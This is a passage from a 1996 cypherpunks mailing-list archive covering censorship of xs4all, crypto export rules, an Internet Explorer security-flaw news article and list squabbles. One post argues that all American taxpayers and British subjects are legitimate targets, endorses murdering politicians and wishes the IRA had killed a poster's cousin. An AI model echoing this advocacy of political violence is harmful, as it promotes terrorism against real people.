at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From harveyrj at vt.edu Mon Sep 23 20:26:45 1996 From: harveyrj at vt.edu (R. J. Harvey) Date: Tue, 24 Sep 1996 11:26:45 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <2.2.32.19960924003804.00f487f8@mail.vt.edu> At 02:59 PM 9/23/96 -0700, Lucky Green wrote: >Yes, you can be sued for sexual harrasment for trying to pick up a >stranger in a bar, should that stranger still feel bothered by your >advances while at work the next day. > >The courts have ruled, > Let's see some citations. Only if the two people involved are employed by the same employer might such an argument apply, and even then it's a long stretch under a "hostile work environment" argument. Cite a case in which individuals working for DIFFERENT employers successfully brought such a ridiculous suit. There's no way. rj From tcmay at got.net Mon Sep 23 20:27:23 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 11:27:23 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: At 6:31 PM 9/23/96, tank wrote: >Hi all, > >We have temporary removed radikal 154 from xs4all. > >We did this because the german ICTF and BAW continued to stop IP-traffic >to and from xs4all. They not only blocked the web-server (with more than ... Unfortunately, this means that Germany wins. This will embolden Germany and other nations to apply similar pressures to other ISPs. While I don't fully understand the economic pressures the IP-traffic blockage may have had on your site, it is sad that a user account has been removed because some foreign government doesn't like it. My recommendation is that you restore radikal 154's account immediately, and post a message to all customers and on various Net forums indicating you will not remove user accounts for materials which do not violate your own national laws. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From strick at versant.com Mon Sep 23 20:32:50 1996 From: strick at versant.com (strick (henry strickland)) Date: Tue, 24 Sep 1996 11:32:50 +0800 Subject: Blocks Colon [Re: Internet File System] In-Reply-To: <1.5.4.32.19960922191022.00736898@pop.mindspring.com> Message-ID: <9609232130.AA03957@vp.versant.com> -----BEGIN PGP SIGNED MESSAGE----- # The other day, it occurred to me that Java could really take off if there # was some sort of file system. And, since you can't write to local files # with Java, the obvious solution is to set up the 'fopen, fclose(), etc) # set of functions that are 'rpcs' to some server application on the same # computer as the web server the applet comes from. Here's my crypto-friendly design for this. Define a new TCP protocol called "Blocks Colon". It forms URLs like blocks://blocks.aol.com/strick This protocol is similar to a "block device" in unix, with basic operations to read and write 512-octet blocks, named by an integer index. Other operations are to ask the size of the block file, to change its size, to commit/abort changes, and session authentication (like a POP server). Then in the JAVA box you need -- a class implementing a 'filesystem' (files & directories) on a "block device" -- a "block encryption" filter -- a "block device" client using the "blocks colon" protocol So your program uses the filesystem object, which uses the block encryption filter, which uses the block client, which goes to your ISP's block service. The internet and your ISP sees nothing but encrypted blocks. The encryption key never leaves your personal java box. Your ISP charges you by the block/hour for storage, and by the number of blocks read/written for network. You could keep a backup blocks account at another ISP, and keep the two blocks mirrored (another filter?) or run occasional backups. What annoys me is that java.io.* defines specific classes for filesystem access, rather than a "factory class" and thereafter nothing but interfaces. That makes it difficult to override the "builtin" notion of a filesystem with network-based or crypto-based filesystems, without changing your programs, or tampering with the builtin classes. :( strick -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBaAwUBMkcA0xLAL4qMWktlAQEWPwInbnDWq9o1eosKVCqwjuj+7pDlJ8CRaNCt XflpcmyK8di9rQKS5CMGnSdfvOVJA4epJsGAAKuLfPcSAn4yuKLfsJBcm/Is =DLWN -----END PGP SIGNATURE----- From tcmay at got.net Mon Sep 23 20:51:19 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 11:51:19 +0800 Subject: Bernstein hearing: The Press Release Message-ID: At 9:59 PM 9/23/96, Lucky Green wrote: >As long as the person that you are speaking to is employed in any way, >workplace issues apply. Even if you talk to the person after work and away >from their place of employment. The courts have ruled that the speech does >not have to occur at the workplace to be prohibited. All that is required >is that the person is affected at the workplace. > >Yes, you can be sued for sexual harrasment for trying to pick up a >stranger in a bar, should that stranger still feel bothered by your >advances while at work the next day. > >The courts have ruled, I don't believe this is so. Oh, I believe anybody can sue for anything, but the courts don't have to allow the case to proceed. In this example, it wouldn't get far. While I have objections to the overbroad (no pun intended) way many "sexual harassment" cases have been handled, essentially all of the cases I have heard about have involved employees and/or management within a company. For example, women feeling put upon by "tool girl" calendars in some offices, or women being "looked at inappropriately" by fellow employees. (Plus the more-legitimate complaints, such as being groped in the hallways, being told to hit the sheets or hit the streets, etc.) I don't for a nanosecond believe your example would ever reach a court, civil or criminal. Whom, for example, would the offended party sue? The employer, who had absolutely no involvement, or the stranger in the bar? While there are _stalking_ laws, if the stranger's behavior got extreme enough, there are no laws about trying to get a date. Nor are there any grounds for a person claiming a casual question provoked a mental trauma, blah blah blah. If this topic comes up again in ten years, things may've changed, of course. I'm not hopeful about the direction things are going. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tank at xs4all.nl Mon Sep 23 20:51:46 1996 From: tank at xs4all.nl (tank) Date: Tue, 24 Sep 1996 11:51:46 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: Message-ID: <199609232128.XAA28192@xs1.xs4all.nl> > >We have temporary removed radikal 154 from xs4all. > > > >We did this because the german ICTF and BAW continued to stop IP-traffic > >to and from xs4all. They not only blocked the web-server (with more than > ... > Unfortunately, this means that Germany wins. Nope, hang on ..... > This will embolden Germany and other nations to apply similar pressures to > other ISPs. > > While I don't fully understand the economic pressures the IP-traffic > blockage may have had on your site, it is sad that a user account has been > removed because some foreign government doesn't like it. xs4all didn't remove our account. It's still alive and kickin'. We removed issue 154 _temporary_ so we force the ictf and BAW to block all 48 sites or to stop censoring xs4all. The situation now was that xs4all had to suffer for having been the first ISP where the radikal was hosted. We pointed the BAW and the ICTF to all the mirrors and said to them that their decicion to block xs4all was not enough to block radikal 154 from german netizens and that censorship will lead to the opposite. They won't listen and tried to let xs4all pay for not removing radikal 154. XS4ALL lost some customers due the blockade. We (SPG) were the ones who have put the radikal online. We are glad to have xs4all as isp. They didn't force us to remove the radikal 154. We did it, and we do it temporary. The issue 154 will be put online as soon as we think the situation is there. henk (SPG) From tcmay at got.net Mon Sep 23 21:00:22 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 12:00:22 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: At 9:22 PM 9/23/96, sameer at c2.net wrote: >> Unfortunately, this means that Germany wins. > > How does this mean that Germany wins? "radikal 154" is still >available all over the world, at almost 50 mirror sites, I beleive >(including http://www.c2.net/radikal/), which are *not* blocked by >Germany. Germany went after the most visible site, the _original_ site. That other sites were mirroring the verboten material did not stop them from blocking access to xs4all, so Germany clearly still wanted to make an example of xs4all. That xs4all eventually capitulated has to be seen as a win for Germany. (Certainly within the government of Germany, they must be viewing this as a victory.) They will probably now turn their sights on other sites (no pun intended), hoping to pick off each one in turn. I guess it's the domino theory all over again. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Mon Sep 23 21:18:59 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 12:18:59 +0800 Subject: Has the list sunk this low? Message-ID: At 9:04 PM 9/23/96, Wayne H. Allen wrote: >At 08:45 AM 9/23/96 -0400, Wearen Life wrote: >>The CIA has many powers both great and small. If the can cover up findings >>of UFO's > > > > Has this list sunk that low? The list is like a social club, except with more than 1000 members all able to speak up at any time, on any subject. The random babblings of any one person mean little about what other people think. It's a cognitive error to assume the list has some "level" it can sink to, or rise to, or whatever. The best way to improve the S/N ratio is to post good signal, to find topics of interest and then write about them. --Tim May (P.S. I've removed these names from the distribution list: firewalls at GreatCircle.COM, Wearen Life , Shane Brath , Skeeve Stevens . I again urge people to try to trim the distribution list.) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From ichudov at algebra.com Mon Sep 23 21:20:15 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Tue, 24 Sep 1996 12:20:15 +0800 Subject: possible solution to cyber S/N In-Reply-To: <199609231847.LAA29832@netcom5.netcom.com> Message-ID: <199609232354.SAA00523@manifold.algebra.com> Vladimir Z. Nuri wrote: > > taking this idea to the cyberspace arena, the application is > immediately obvious-- pages that are linked to by a lot of > other pages are valuable, those that are not are not as > valuable. > The above is wrong from two standpoints: Locally: if my taste is sufficiently different from that of other people, why should I follow their preferences? Globally: Vladimir's recommendations lead to a vicious circle of "tyranny" of popular sites because hte more people view a site, the more will follow and the site's "attractiveness" rating will go even higher. It is similar to a recommendation to buy stocks when they are rising. If enough people follow it, stock crashes like in 1929 are imminent. - Igor. From adam at homeport.org Mon Sep 23 21:27:09 1996 From: adam at homeport.org (Adam Shostack) Date: Tue, 24 Sep 1996 12:27:09 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: Message-ID: <199609240225.VAA04788@homeport.org> Theres a personal use exemption. Michael Froomkin's web page has a pointer to it. Adam Hamish wrote: | Soon I am going to be going overseas to Japan, and I want to take | my notebook with me so I can keep up with everything, however, I have | encrypted my hard drive and usually encrypt my mail. Is this in violation | of the ITAR to keep everything the same when I go over? | | -- "It is seldom that liberty of any kind is lost all at once." -Hume From jfricker at vertexgroup.com Mon Sep 23 21:41:11 1996 From: jfricker at vertexgroup.com (John Fricker) Date: Tue, 24 Sep 1996 12:41:11 +0800 Subject: SAK_net Message-ID: <19960923211212041.AAA185@dev.vertexgroup.com> -----BEGIN PGP SIGNED MESSAGE----- >John Young (jya at pipeline.com) said something about SAK_net on or about 9/23/96 12:59 PM > > 9-23-96. WaJo: > > "SAIC Is Near Agreement to Buy Bellcore" > Didn't SAIC buy Network Solutions (registration part of the NIC) as well? -----BEGIN PGP SIGNATURE----- Version: 2.9 iQCVAgUBMkb+NbuA0owOB/fpAQGeEwQAoUellf90G+TKT+Lyeqsi21iFqQwNCx5S XJMmLCq6L2bb4L04I15Vz4yk2o8spHgCVKz0bqir16CFr0dCPd74OdIZ6e2mUsGT y5qyFsyE4FCFVt4/1UN1Oeeb2Ap/9Yk/NA4ZM2BNvLqHw7JP6+vvdL7rtCPxRF7u g0RgvJ8NNh4= =K7QY -----END PGP SIGNATURE----- From omegaman at bigeasy.com Mon Sep 23 22:32:01 1996 From: omegaman at bigeasy.com (Omegaman) Date: Tue, 24 Sep 1996 13:32:01 +0800 Subject: Snake-Oil FAQ In-Reply-To: <3245E50C.4B10@gte.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 22 Sep 1996, Dale Thorn wrote: > Maybe I shouldn't have tried to (slightly) change the subject. It was > my thought that someone could encourage the person(s) who wanted to do a > Snake-Oil product list to generalize the list, to be a more scholarly > reference, and not just a blacklist. Since the original(?) proposal > concerned actual products, and not just techniques which fit into neatly > identifiable categories, that might justify a Consumer Reports type of > review list for these products. > One of the goals of a "Snake-Oil FAQ" as proposed is to gain as wide a distribution as possible. If a "blacklist" of products is put into the FAQ, or if actual existing products are referred to a negative light, the distribution of this FAQ will be severely limited. I also think that as a whole, this project is a good idea and a good mini-project. As crypto continues to spread, it is inevitable that "bad" crypto will spread as well. While these products will surely come and go with the phases of the moon, some people will be undoubtedly be suckered and soured towards crypto-technology in general. (sarcasm) "If it saves just one...." (\sarcasm) It has been said before that the best way to counter noise is with signal. If one of the primary goals of cypherpunks is to encourage the widespread use of strong crypto, then, by extension, it is important to discourage the spread of "crappy crypto." _______________________________________________________________ Omegaman PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2 59 0A 01 E3 AF 81 94 63 Send e-mail with "get key" in the "Subject:" field to get a copy of my public key _______________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: latin1 iQCVAwUBMkc7Gab3EfJTqNC9AQGBywP+M037TzDBjy/F5MgmKv+x/9lhQrnQsMQ6 xlOB3ApjLHZvoKI//PyHoCKiuCw9BVnTskAE16iu19yWZmUWNL3S6hsOFxex1MMU pf6YQSajpE4mOSsih8j+b2T60ERXx/jz2BAwGEjtf4azCuGUxObUgX75ydmLoNft Po4HbyimOtY= =Yg1d -----END PGP SIGNATURE----- From tcmay at got.net Mon Sep 23 22:32:56 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 13:32:56 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: At 9:46 PM 9/23/96, Mike McNally wrote: >place. While the Germans are off blocking other sites, xs4all can >re-host the material as soon as the Bundesfeds unblock their ^^^^^^^^^^ Beavis and Bundesfed? --Tim We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From merriman at amaonline.com Mon Sep 23 23:42:08 1996 From: merriman at amaonline.com (merriman at amaonline.com) Date: Tue, 24 Sep 1996 14:42:08 +0800 Subject: No Subject Message-ID: <199609240458.VAA29786@toad.com> >From cypherpunks-errors at toad.com Tue Sep 24 00:24:32 1996 Return-Path: cypherpunks-errors at toad.com Received: from toad.com (toad.com [140.174.2.1]) by oak.westol.com (8.7.5/8.6.9) with ESMTP id AAA16311 for ; Tue, 24 Sep 1996 00:24:29 -0400 Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id KAA22710 for cypherpunks-outgoing; Mon, 23 Sep 1996 10:53:36 -0700 (PDT) Received: from hal.amaonline.com ([207.0.45.76]) by toad.com (8.7.5/8.7.3) with SMTP id KAA22705 for ; Mon, 23 Sep 1996 10:53:14 -0700 (PDT) Date: Mon, 23 Sep 1996 10:53:14 -0700 (PDT) Message-Id: <199609231753.KAA22705 at toad.com> Received: from [207.0.45.102] (HELO PINKRNGR) by hal.amaonline.com (AltaVista Mail F1.0/1.0 BL18 listener) id 0000_0070_3246_ce50_809a; Mon, 23 Sep 1996 12:52:16 -0500 From: "David K. Merriman" To: cypherpunks at toad.com Reply-To: merriman at amaonline.com X-Priority: Normal Subject: Paradox db passwords/encryption X-Mailer: Pronto Secure [Ver 1.03] MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Pgprequest: signed Sender: owner-cypherpunks at toad.com Precedence: bulk X-UIDL: 843540068.001 -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com Reply-To: merriman at amaonline.com Date: Mon Sep 23 12:52:32 1996 Sorry to disturb everyone, but I've got a questions that is (gasp!) immediately related to crypto: Does anyone have any info on the encryption used in the Paradox (4.5 for Win) database? I've got someone that has an encrypted (well, password-protected :-) Paradox database that needs some maintenance, and the person that knew the password is now - shall we say - 'no longer with them'. Right now, doesn't matter if it's something clever, or a brute-force hack; they just need to get into the tables and such. Dave Merriman - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- PGP Email welcome, encouraged, and PREFERRED. Visit my web site at http://www.shellback.com/p/merriman for my PGP key and fingerprint "What is the sound of one hand clapping in a forest with no one there to hear it?" I use Pronto Secure (tm) PGP-fluent Email software for Windows -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMkYXlcVrTvyYOzAZAQGcxgQAleY6gXoM1n0AbYSUogW9Zo4brlHgsEHW vs3aAh+DQEaWJKc9ltXlDK94su9uJbAo3gb4cvG0EnBDifpqlS/bya7fG9KlcM6H k6REe2Ui6xBLtbjJTa5fmAjmeLYPSKnF5z6Eql8VpdZPoS0hqKZKgdyogMrai4Dx esOt90XBqVk= =hibj -----END PGP SIGNATURE----- From DMiskell at envirolink.org Mon Sep 23 23:49:12 1996 From: DMiskell at envirolink.org (Daniel Miskell) Date: Tue, 24 Sep 1996 14:49:12 +0800 Subject: A daily warning regarding Tim ... [edited] Message-ID: <199609240243.WAA16832@envirolink.org> The not allowing unsubscribed individuals to post is logical, for a time. But that basically outlaws anon remailers that don't allow you to send to an account, and a lot of them don't, from my limited understanding. Besides, if we set up the list to ban people who are 'undesirable', instead of just using our own killfiles to do the dirty work for the list, then what is to stop someone from banning you? Sure, you move on to another list, but, personally, I wouldn't want it done to me, and so I would not do it to someone else. But, like I said, personal killfiles are more than encouraged. It resolves these kinds of conflicts a lot faster and cleaner than debating who and who should not be banned. Daniel. From Wyntermute at postoffice.worldnet.att.net Mon Sep 23 23:50:29 1996 From: Wyntermute at postoffice.worldnet.att.net (Wyntermute at postoffice.worldnet.att.net) Date: Tue, 24 Sep 1996 14:50:29 +0800 Subject: No Subject Message-ID: <19960924051112.AAA28933@Darkstar> test message From gary at systemics.com Tue Sep 24 00:00:04 1996 From: gary at systemics.com (gary at systemics.com) Date: Tue, 24 Sep 1996 15:00:04 +0800 Subject: No Subject Message-ID: <199609240458.VAA29783@toad.com> >From cypherpunks-errors at toad.com Tue Sep 24 00:06:48 1996 Return-Path: cypherpunks-errors at toad.com Received: from toad.com (toad.com [140.174.2.1]) by oak.westol.com (8.7.5/8.6.9) with ESMTP id AAA15647 for ; Tue, 24 Sep 1996 00:06:48 -0400 Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id LAA23286 for cypherpunks-outgoing; Mon, 23 Sep 1996 11:26:23 -0700 (PDT) Received: from smokey.systemics.com (smokey.systemics.com [193.67.124.65]) by toad.com (8.7.5/8.7.3) with SMTP id LAA23280 for ; Mon, 23 Sep 1996 11:26:14 -0700 (PDT) Received: from internal-mail.systemics.com (kp1HuXoYZnhRYRtN5QVHP59VjfL1vS2Z at internal-mail.systemics.com [193.67.124.74]) by smokey.systemics.com (8.6.12/8.6.12) with ESMTP id UAA10263 for ; Mon, 23 Sep 1996 20:26:00 +0200 Received: (from gary at localhost) by internal-mail.systemics.com id UAA16049 for cypherpunks at toad.com; Mon, 23 Sep 1996 20:26:40 +0200 Date: Mon, 23 Sep 1996 20:26:40 +0200 From: Gary Howland Message-Id: <199609231826.UAA16049 at internal-mail.systemics.com> To: cypherpunks at toad.com Reply-To: gary at systemics.com Subject: Security flaw in Microsft Explorer Sender: owner-cypherpunks at toad.com Precedence: bulk X-UIDL: 843538362.000 Status: U Program compromises IE security By Nick Wingfield September 23, 1996, 10:45 a.m. PT A start-up Internet company has posted a program on the Net that could allow Web sites to bypass the security controls in Internet Explorer, CNET has learned. The company, InfoSpace, created a program aimed at Net search engines such as Lycos and Excite that want to become the default search engine in Microsoft's Internet Explorer 3.0. But the program, which is actually featured on the Lycos Web site, manages to circumvent Explorer's security warning window--an action that could let InfoSpace sneak programs onto a user's personal computer without warning. Although the InfoSpace program apparently was not created with malicious intent, it underscores the fragility of Internet Explorer's security defenses, as well as broader security issues related to downloading software over the Internet. The InfoSpace program sidesteps a security feature in Internet Explorer, called Authenticode, which is designed to allow users to verify the origins of a piece of software code, such as an ActiveX control, a script, or a plug-in. The Authenticode system requires a user to entrust the developer of a program, whether it's InfoSpace, Lotus Development, or IBM, not to install viruses or other destructive programs on the user's system. Although Authenticode does not prevent software developers from creating such programs, they can be held legally accountable for bad code. That's because the programs contain "digital signatures," a sort of ID card that allows perpetrators to be tracked down by law enforcement agencies. Microsoft works with VeriSign to provide digital signatures for programs. Last month, VeriSign took matters into its own hands by asking a developer, Fred McLain, to remove an ActiveX control called Exploder from his Web site. The Exploder control was designed to crash a user's computer after downloading. "Code signing is not a guarantee of code quality," Charles Fitzgerald, a product manager at Microsoft said. "It's an accountability trail." As with all digitally signed programs, users are offered the option to accept or to reject the InfoSpace program before installing it on their systems. Users are also offered the option to bypass the Authenticode warning window for all InfoSpace programs in the future. But the company's program registers InfoSpace as a "trusted publisher" in Explorer, effectively opening the browser to intrusions. The operation is akin to inviting a guest over to your house for dinner and having them copy the key to your front door without permission. InfoSpace executives denied that there was any malice intended in its program, adding that it has provided Lycos with an updated version of the code. Lycos plans to post the new program later this evening, according to InfoSpace. "It was a bug that got incorporated into the production code," InfoSpace CEO Naveen Jain said. Lycos CEO Bob Davis said he was not aware of the bug in the InfoSpace program and could not comment on it. The program is identified as Lycos Quick Search on the search engine's site. However, Microsoft officials expressed concern, saying it is hard to defend against once a user has consented to download code from the Net. "Clearly their software is doing something a tad aggressive," said Rob Price, a group program manager for Internet security at Microsoft."[With Authenticode], users are making a one-time trust decision, this is a persistent trust decision." Microsoft argued that Explorer provides better security than Netscape Communications' Navigator, which does not currently allow digital signatures on plug-ins. In Explorer, users are warned before downloading code even if the program does not contain a digital signature, though the source of the program is not identified. In contrast to plug-in software and ActiveX controls, Java applets are prevented from damaging a user's computer through built-in restrictions in the Java Virtual Machine. "Java is the model for dynamic executable content on the Net," said Eric Greenberg, group security manager at Netscape. From shamrock at netcom.com Tue Sep 24 00:01:47 1996 From: shamrock at netcom.com (Lucky Green) Date: Tue, 24 Sep 1996 15:01:47 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <32472AF1.1417@vail.tivoli.com> Message-ID: On Mon, 23 Sep 1996, Mike McNally wrote: > Lucky Green wrote: > > > > Yes, you can be sued for sexual harrasment for trying to pick up a > > stranger in a bar, should that stranger still feel bothered by your > > advances while at work the next day. > > > > The courts have ruled, > > To paraphrase the probably-great Charles Haynes, "my bullshit meter > is jiggling up near the red line". Is there really a case of a person > being convicted of workplace sexual harassment against somebody they > didn't work with? Not that I am aware of. But the test *clearly* is how it makes you feel once at work, regardless of other circumstances. --Lucky From camcc at abraxis.com Tue Sep 24 00:01:54 1996 From: camcc at abraxis.com (camcc at abraxis.com) Date: Tue, 24 Sep 1996 15:01:54 +0800 Subject: No Subject Message-ID: <199609240458.VAA29784@toad.com> >From cypherpunks-errors at toad.com Tue Sep 24 00:20:12 1996 Return-Path: cypherpunks-errors at toad.com Received: from toad.com (toad.com [140.174.2.1]) by oak.westol.com (8.7.5/8.6.9) with ESMTP id AAA16114 for ; Tue, 24 Sep 1996 00:20:11 -0400 Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id MAA24022 for cypherpunks-outgoing; Mon, 23 Sep 1996 12:43:09 -0700 (PDT) Received: from smtp1.abraxis.com (SMTP1.ABRAXIS.COM [206.155.199.210]) by toad.com (8.7.5/8.7.3) with SMTP id MAA23992 for ; Mon, 23 Sep 1996 12:41:23 -0700 (PDT) From: camcc at abraxis.com Received: from [206.155.199.39] by smtp1.abraxis.com (NTMail 3.01.03) id ua044324; Mon, 23 Sep 1996 15:44:56 -0400 Message-Id: <2.2.32.19960923194301.0069bebc at smtp1.abraxis.com> X-Sender: camcc at smtp1.abraxis.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 23 Sep 1996 15:43:01 -0400 To: cypherpunks at toad.com Reply-To: camcc at abraxis.com Subject: GA HB1630 Lawsuit: Press Advisory Sender: owner-cypherpunks at toad.com Precedence: bulk X-UIDL: 843538926.000 Status: U >X-Sender: rcostner at intergate.net >Reply-To: efg-action at ninja.techwood.org > >Joint Media Advisory: > >AMERICAN CIVIL LIBERTIES UNION >ELECTRONIC FRONTIERS GEORGIA >REP. MITCHELL KAYE > >Groups to Mount Legal Challenge to Georgia Cyberspace Law > >FOR IMMEDIATE RELEASE Contact: See list below >Friday, September 20, 1996 > > ATLANTA, GA-- -The American Civil Liberties Union, Electronic Frontiers >Georgia, Georgia State Representative Mitchell Kaye (R-Marietta) and others >will be holding a news conference on Tuesday, September 24 at 10:30 a.m., >immediately after filing a lawsuit seeking a preliminary injunction against a >Georgia law barring communications in cyberspace. > > The suit names Governor Zell Miller and Attorney General Michael Bowers as >defendants, and will be filed on behalf of 13 plaintiffs. >------------------------------------------------------------------------------ >-------------------------------------- > > WHO: > >Attorneys Ann Beeson (ACLU) and Scott McClain (Bondurant, Mixson & Elmore) > >Plaintiffs Robert Costner (executive director, Electronic Frontiers Georgia); >Jeff Graham (AIDS Survival Project); Rep. Mitchell Kaye (GA House of >Representatives); Bonnie Nadri (The Page Factory); Teresa Nelson (ACLU of >Georgia); Eric Van Pelt (Atlanta Veterans Alliance); Josh Riley (individual >plaintiff); and Kimberly LyleWilson (Atlanta Freethought Society). > > WHAT: > >News conference to announce filing of legal challenge to Georgia >cyberspace law. > > WHEN: > >Tuesday, September 24, 10:30 a.m. > > WHERE: > >ACLU of Georgia >142 Mitchell Street SW (at Peachtree), Suite 301, Atlanta >(404) 523-6201 > >Note: Copies of the brief and plaintiff affidavits will be available at the >news conference and online at the EFGA website, and >through the ACLU's website and America Online site >(keyword: ACLU). > >Contacts: Teresa Nelson, ACLU GA Ann Beeson, national ACLU: 404-523-6201 > Robert Costner, EFGA: 770-512-8746 > Rep. Mitchell Kaye: 770-998-2399 > Scott McClain: 404-881-4138 > Emily Whitfield, ACLU Nat'l Press Office: 212-944-9800 x426 > > > From Wyntermute at postoffice.worldnet.att.net Tue Sep 24 00:12:05 1996 From: Wyntermute at postoffice.worldnet.att.net (Wyntermute at postoffice.worldnet.att.net) Date: Tue, 24 Sep 1996 15:12:05 +0800 Subject: No Subject Message-ID: <19960924051414.AAA29725@Darkstar> test From frissell at panix.com Tue Sep 24 00:18:39 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 24 Sep 1996 15:18:39 +0800 Subject: crypto anarchy vs AP Message-ID: <3.0b19.32.19960923225428.00b29a50@panix.com> At 11:26 AM 9/23/96 -0700, Clint Barnett wrote: >ever read "1984"? the appearance of a free lifestyle is most definitely >not a free lifestyle. I am hardly a friend of the state, and far from >being an advocate of the church, but multinational corporations running >the world for their own fun and profit makes my sphincter clench. The lifestyle in "1984" didn't appear free. Someone who thinks that an institution like the government that gains all its revenue by force and is armed with nukes is less dangerous than institutions that are shrinking in size and gain most of their revenue by voluntary exchange is nuts. DCF From nobody at cypherpunks.ca Tue Sep 24 00:25:51 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Tue, 24 Sep 1996 15:25:51 +0800 Subject: The daily word of advice regarding Tim Mayo Message-ID: <199609240520.WAA22684@abraham.cs.berkeley.edu> What a joy to make a public mockery of Tim Mayo! From dlv at bwalk.dm.com Tue Sep 24 00:34:50 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 24 Sep 1996 15:34:50 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <9609232148.AA17056@vesuvius.ai.mit.edu> Message-ID: <6XJquD10w165w@bwalk.dm.com> hallam at vesuvius.ai.mit.edu writes: > So Jim Bell is opposed to "truly random attacks on ordinary citizens" > Its this type ofappoligia for terrorism that disgusts me utterly. There is no such thing as an "ordinary citizen". When the U.S. commits war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere, every American taxpayer is an accomplice and a fair game. Likewise, any Britih subject is fair game for IRA's self-defense against centuries of British genocide and oppression. > He is calling for murder but wants to dress it up in whatever psychotic > justifications he can. Murder can be justified. > He is also completely wrong. When the IRA attemoted to assasinate my cousin > I was in no way intimidated and neither was he. He continued as a senior > poitician for over a decade despite continued danger. I can think of no > less effective method of bringing about change in attitudes. I think public executions of politicians would be a more effective way to indimidate the potential successors than covert assassinations. Joe Stalin liked public hangings toward the end of his life. I'd rather see the bastards hang in a nationally televised ceremony, live from the Rose Garden, but I guess -- whatever gets the job done. It's a pity the IRA didn't nail your cousin. I wish them better luck next time. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From m5 at tivoli.com Tue Sep 24 00:44:38 1996 From: m5 at tivoli.com (Mike McNally) Date: Tue, 24 Sep 1996 15:44:38 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: Message-ID: <32470540.6B28@tivoli.com> Timothy C. May wrote: > > At 6:31 PM 9/23/96, tank wrote: > >Hi all, > > > >We have temporary removed radikal 154 from xs4all. > > Unfortunately, this means that Germany wins. I partially agree, but then again the stuff is mirrored all over the place. While the Germans are off blocking other sites, xs4all can re-host the material as soon as the Bundesfeds unblock their addresses. Eventually, I suspect it'd get pretty embarrassing for the censors. ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From jimbell at pacifier.com Tue Sep 24 00:46:29 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 24 Sep 1996 15:46:29 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <199609240135.SAA23298@mail.pacifier.com> At 05:48 PM 9/23/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >So 